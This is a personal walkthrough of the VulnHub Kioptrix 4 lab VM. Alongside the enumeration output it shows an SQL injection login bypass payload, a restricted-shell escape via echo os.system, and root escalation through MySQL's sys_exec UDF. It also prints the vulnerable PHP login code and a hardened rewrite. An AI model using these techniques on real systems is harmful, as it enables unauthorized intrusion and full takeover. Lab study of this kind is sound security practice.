vulnhub Kioptrix1.3 notes
kioptrix 1.3
pentest
arp-scan -I eth0 -l
for the IP scan.
Service enumeration
# nmap -p- 10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 11:14 EDT
Nmap scan report for 10.10.10.6
Host is up (0.00047s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:4F:0D:1D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 38.42 seconds
root@kali:~/EXattack/Vulunhub/kioptrix1-3# nmap -P0 -p22,80,139,445 -sV -version-all 10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 11:14 EDT
Nmap scan report for 10.10.10.6
Host is up (0.00088s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:4F:0D:1D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.17 seconds
Points of interest
- OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
- Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
- Samba smbd 3.X - 4.X (workgroup: WORKGROUP) ×2
Details
OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
Nothing special?
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
# nikto -h 10.10.10.6
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.6
+ Target Hostname:    10.10.10.6
+ Target Port:        80
+ Start Time:         2020-04-29 03:56:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8672 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2020-04-29 03:56:51 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.6

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Apr 29 03:58:08 2020
URL_BASE: http://10.10.10.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.6/ ----
+ http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:325)
==> DIRECTORY: http://10.10.10.6/images/
+ http://10.10.10.6/index (CODE:200|SIZE:1255)
+ http://10.10.10.6/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://10.10.10.6/john/
+ http://10.10.10.6/logout (CODE:302|SIZE:0)
+ http://10.10.10.6/member (CODE:302|SIZE:220)
+ http://10.10.10.6/server-status (CODE:403|SIZE:330)

---- Entering directory: http://10.10.10.6/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.6/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Wed Apr 29 03:58:10 2020
DOWNLOADED: 4612 - FOUND: 6
First, connecting to "http://10.10.10.6" brings up a login form.
Entering a single quote "'" in Username and Password, an error is thrown when the "'" goes into Password.
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28
Put anything in Username and SQLi in Password, and it might be possible to log in.
Entering something like "'or 1=1 or ''='" in Password gives
User admin Oups, something went wrong with your member's page account. Please contact your local Administrator to fix the issue.
but the login has not succeeded.
Come to think of it, there was a "john" in the dirb results.
I tried Username "john" and Password "'or 1=1 or ''='".
Member's Control Panel Username : john Password : MyNameIsJohn
The login appears to have succeeded.
For now, let's look at the other files too.
Nothing of interest in /images/.
/john/ has a mysterious php file, "john.php".
Accessing it shows the same login form, and I confirmed login the same way as with "index.php".
Try whether ssh as john works.
# ssh john@10.10.10.6
john@10.10.10.6's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ cd ../
*** forbidden path -> "/home/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
john:~$ ls ../
*** forbidden path -> "/home/"
*** Kicked out
Connection to 10.10.10.6 closed.
john's usable commands are restricted, and on top of that a violation gets the connection cut.
Just call a different shell via echo, then.
References
SANS Cyber Security Certifications & Research
Spawning a TTY Shell
So, with rlwrap attached as well:
# rlwrap ssh john@10.10.10.6
john@10.10.10.6's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
Now that I have a shell, look for a path to root.
First, let's go look at the website files I couldn't see earlier.
john@Kioptrix4:~$ cd /var/www/
john@Kioptrix4:/var/www$ ls
checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
Go through them in order.
john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);

//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}

ob_end_flush();
?>
Hit something good right away?
The MySQL login credentials are written at the top.
So this means MySQL is running with root privileges, doesn't it?
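Added example, not code from the VM or from the original post: a hardened rewrite of the checklogin.php logic above. It assumes PHP 7 or later, a `password_hash` column holding password_hash() output instead of cleartext, and a dedicated low-privilege MySQL account `members_app` whose password comes from the environment; none of these exist on the VM.

```php
<?php
// Added example (not the VM's code, not the post author's): a hardened
// replacement for the checklogin.php logic above.
// Assumptions not taken from the VM: the members table has a `password_hash`
// column produced by password_hash(), and a dedicated low-privilege MySQL
// account `members_app` (password from the environment) replaces root with
// an empty password.
session_start();

try {
    $pdo = new PDO('mysql:host=localhost;dbname=members;charset=utf8mb4',
                   'members_app', getenv('MEMBERS_DB_PASSWORD'), [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]);

    $myusername = (string)($_POST['myusername'] ?? '');
    $mypassword = (string)($_POST['mypassword'] ?? '');

    // The original pasted $mypassword straight into the SQL string, which is
    // why 'or 1=1 or ''=' in the Password field selected a row. A bound
    // parameter travels separately from the query text and cannot change it.
    $stmt = $pdo->prepare(
        'SELECT username, password_hash FROM members WHERE username = :u LIMIT 1');
    $stmt->execute([':u' => $myusername]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    // Log server-side only; the original's PHP warnings (including the
    // /var/www/checklogin.php path) went straight to the browser.
    error_log('checklogin: ' . $e->getMessage());
    http_response_code(500);
    exit('Login temporarily unavailable');
}

// Compare against a hash instead of the cleartext the member page displays.
if ($row !== false && password_verify($mypassword, $row['password_hash'])) {
    session_regenerate_id(true);            // fresh session id on login
    $_SESSION['myusername'] = $row['username'];
    // Unlike the original, the password is not stored in the session and
    // the username is not placed in the redirect URL.
    header('Location: login_success.php');
    exit;
}

// One generic message for unknown user and wrong password alike.
http_response_code(401);
echo 'Wrong Username or Password';
print('<form method="get" action="index.php"><input type="submit" value="Try Again"></form>');
```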
The following article made me go ( ゚д゚)ハッ!
Command execution with a MySQL UDF | Bernardo Dag
MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux
So SQL has a thing called a UDF.
First,
john@Kioptrix4:/var/www$ whereis lib_mysqludf_sys
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
If it's there, then....
That means......
john@Kioptrix4:/var/www$ mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 71
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec('id > /tmp/id.txt');
+------------------------------+
| sys_exec('id > /tmp/id.txt') |
+------------------------------+
| NULL                         |
+------------------------------+
1 row in set (0.01 sec)

mysql> select sys_exec('chmod 777 /tmp/id.txt');
+-----------------------------------+
| sys_exec('chmod 777 /tmp/id.txt') |
+-----------------------------------+
| NULL                              |
+-----------------------------------+
1 row in set (0.01 sec)

mysql> exit
Bye
john@Kioptrix4:/var/www$ cat /tmp/id.txt
uid=0(root) gid=0(root)
!!!!!!
john@Kioptrix4:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:loneferret
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:loneferret
fax:x:21:
voice:x:22:
cdrom:x:24:loneferret
floppy:x:25:loneferret
tape:x:26:
sudo:x:27:
audio:x:29:loneferret
dip:x:30:loneferret
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:loneferret
sasl:x:45:
plugdev:x:46:loneferret
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
dhcp:x:102:
syslog:x:103:
klog:x:104:
scanner:x:105:
nvram:x:106:
fuse:x:107:loneferret
mysql:x:108:
crontab:x:109:
mlocate:x:110:
ssh:x:111:
sambashare:x:112:loneferret
winbindd_priv:x:113:
loneferret:x:1000:
lpadmin:x:114:loneferret
admin:x:115:loneferret,john
john:x:1001:
robert:x:1002:
john@Kioptrix4:~$ mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec("usermod -aG admin john");
+------------------------------------+
| sys_exec("usermod -aG admin john") |
+------------------------------------+
| NULL                               |
+------------------------------------+
1 row in set (0.05 sec)

mysql> exit
Bye
john@Kioptrix4:~$ sudo su
[sudo] password for john:
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:~# cd /root/
root@Kioptrix4:~# ls
congrats.txt  lshell-0.9.12
root@Kioptrix4:~# cat congrats.txt
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.

Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret
I thought I'd blank root's password and try an ssh login, but it complained about public keys or something.
Is adding john to the admin group and becoming root the easiest way?
Would adding "john ALL=(ALL) ALL" to "/etc/sudoers" also work?
If you're working as root and changing permissions, there seem to be plenty of options.
Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Check the exact Samba version.
In my environment, for some reason neither "smbclient" nor "enum4linux" works, so I think metasploit is the only option.
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 10.10.10.6
rhosts => 10.10.10.6
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.10.6:445        - Host could not be identified: Unix (Samba 3.0.28a)
[*] 10.10.10.6:445        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_version) > exit
Hmm, no idea.
The end
Open question: if a user other than root launches /bin/(ba)sh after "chmod u+s /bin/(ba)sh", does that count as taking root?
Open question: smbclient and enum4linux won't work properly for me.